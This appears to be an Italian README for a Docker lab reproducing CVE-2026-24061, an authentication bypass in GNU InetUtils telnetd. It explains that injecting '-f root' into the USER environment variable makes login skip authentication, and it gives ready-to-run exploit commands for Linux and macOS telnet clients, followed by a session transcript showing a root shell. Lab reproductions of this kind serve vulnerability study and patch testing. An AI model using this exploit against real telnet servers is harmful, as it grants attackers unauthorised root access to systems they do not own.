
GNU telnetd service da GNU InetUtils bypass dell'autenticazione
Nel gennaio 2026, il servizio GNU telnetd di GNU InetUtils è risultato vulnerabile al bypass dell'autenticazione, scoperto da Kyu Neushwaistein (alias Carlos Cortes Alvarez). Tracciata come CVE-2026-24061, questa falla consente a un attaccante di stabilire una sessione Telnet senza fornire credenziali valide, garantendo accesso non autorizzato al sistema di destinazione. La vulnerabilità è presente fino alla versione 2.7-2 del servizio GNU telnetd e sembra uscita direttamente dagli anni '90.
Si tratta di una vulnerabilità di injection di argomenti (CWE-88) con punteggio CVSS v3.1 di 9.8 (Critico).
Riferimenti:
Compila ed esegui:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
Dopo l'avvio del servizio, telnetd sarà in ascolto sulla porta 23.
La vulnerabilità consente di bypassare l'autenticazione iniettando il flag -f nella variabile d'ambiente USER. Quando telnetd riceve un nome utente che inizia con -f, lo passa al programma di login che interpreta -f come un flag per saltare l'autenticazione.
Usa il seguente comando per sfruttare questa vulnerabilità e ottenere accesso root:
# Client Linux (richiede l'opzione -a)
USER="-f root" telnet -a 127.0.0.1 23
# Client macOS (nessuna opzione -a necessaria)
USER="-f root" telnet 127.0.0.1 23
Dopo lo sfruttamento riuscito, avrai accesso a una shell root senza fornire una password.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)